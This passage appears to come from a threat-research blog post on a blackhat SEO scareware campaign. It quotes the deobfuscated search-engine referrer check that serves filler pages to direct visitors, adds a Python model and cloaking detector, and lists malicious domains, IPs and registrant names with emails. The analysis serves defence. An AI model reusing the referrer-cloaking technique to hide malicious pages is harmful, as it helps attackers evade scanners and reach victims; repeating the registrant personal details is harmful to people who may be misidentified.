For instance, once deobfuscated, the script checks whether the user is coming from the following search engines: var se = new Array("google", "msn", "aol.com", "yahoo", " comcast"); if (document.referrer)ref = document.referrer;. If the user/researcher is simply wandering around without a search engine referrer, a blackhat SEO page with no malicious redirections is served.
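Two variants of the engine list appear on this page: the April 22 snippet ("google.","msn.","yahoo.","comcast.","aol.","dead", with a loop of i<5) and the one quoted above. The Python below is an added example, not the campaign's usa.js: it models the referrer decision both snippets make, and shows two consequences visible in the quoted code itself, namely that the i<5 bound never consults the sixth entry and that the leading space in " comcast" cannot match a real referrer URL. It also shows the check an analyst or URL scanner can run against a suspected page: fetch it under several referrers and flag it when the responses differ. The fetch is simulated with a constructed stand-in so the example runs offline; constructed_fetch, the engine list names and the placeholder URL are the example's own.

```python
"""Model the referrer check behind the campaign's usa.js-style cloaking.

Added example, not the campaign's script. It reproduces the decision logic
visible in the two quoted snippets (a list of search-engine substrings compared
against document.referrer, with a loop bound that only visits the first five
entries) and uses it to show why a direct visit sees a harmless page while a
search-engine arrival is redirected. It also shows a cloaking check: fetch the
same URL under several referrers (simulated here with constructed responses)
and flag the URL when the answers differ.
"""
from typing import Callable, Dict, List, Optional

# The two engine lists quoted in the posts (the second keeps its leading-space " comcast")
SE_LIST_APRIL22 = ["google.", "msn.", "yahoo.", "comcast.", "aol.", "dead"]
SE_LIST_APRIL15 = ["google", "msn", "aol.com", "yahoo", " comcast"]


def is_search_engine_referrer(referrer: Optional[str], engines: List[str],
                              loop_bound: int = 5) -> bool:
    """Mirror the script: ref = document.referrer or ""; substring test over engines[:loop_bound]."""
    ref = referrer or ""
    return any(needle in ref for needle in engines[:loop_bound])


def landing_page(referrer: Optional[str], engines: List[str]) -> str:
    """What a visitor gets: the SEO filler page, or the redirect towards the scareware."""
    if is_search_engine_referrer(referrer, engines):
        return "REDIRECT"      # the second-stage redirect scripts load
    return "SEO_FILLER"        # harmless keyword-stuffed page: what a direct visit sees


def detect_cloaking(fetch: Callable[[str, Optional[str]], str], url: str,
                    referrers: List[Optional[str]]) -> Dict[str, object]:
    """Fetch url once per referrer and report whether the responses differ.

    `fetch(url, referrer)` is whatever HTTP client the analyst uses; a constructed
    stand-in is provided below so the example runs offline.
    """
    responses = {str(r): fetch(url, r) for r in referrers}
    return {"cloaked": len(set(responses.values())) > 1, "responses": responses}


def constructed_fetch(url: str, referrer: Optional[str]) -> str:
    """Stand-in for a real HTTP fetch of a page running the April 22 check."""
    return landing_page(referrer, SE_LIST_APRIL22)


if __name__ == "__main__":
    # Placeholder URL; no network access happens in this example
    result = detect_cloaking(constructed_fetch, "http://cloaked.example/",
                             [None, "http://www.google.com/search?q=mikeyy"])
    print(result)
```

The practical lesson for anyone assessing such a page is the one the post draws: a bare fetch, or a visit from a bookmark, lands on the filler page, so a scanner has to replay the visit with a search-engine referrer before it can judge the content. Varying the referrer and diffing the responses is the cheapest test for this class of cloaking.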

The following are all of the currently active and participating domains/subdomains:
tran.tr.ohost .de
actual.homelinux .com
achyutheil.ac.ohost .de
aprln.getmyip .com
east.homeftp .org 
my1.dynalias .org
my2.dynalias .org
my3.dnsalias .org
my5.webhop .org

The redirection process consists of two layers. The first redirects to hjgf .ru/go.php?sid=5 (88.214.198.25) and then to msscan-files-antivir .com (195.88.81.93); the second takes place through a well known malicious doorway redirection domain, hqtube .com/to_traf_holder.html (88.85.66.116), which either serves a fake codec that drops the scareware, or the scareware itself from files.ms-load-av .com. The rest of the scareware/fake security software domains participating in the campaign are as follows:

msscan-files-antivir .com (195.88.81.93) - Coi Carol Email: car0sta0@gmail.com
hot-girl-sex-tube .com - Erica Thomas Email: gerrione@gmail.com
msscan-files-antivir .com
msscanner-top-av .com - Mui Arnold Email: arnoebr@gmail.com
msscanner-files-av .com
antivir-4pc-ms-av .com - Jason Munguia Email: jasmung@gmail.com

The bottom line - the campaign looks like a typical event-based blackhat SEO portfolio diversification practice.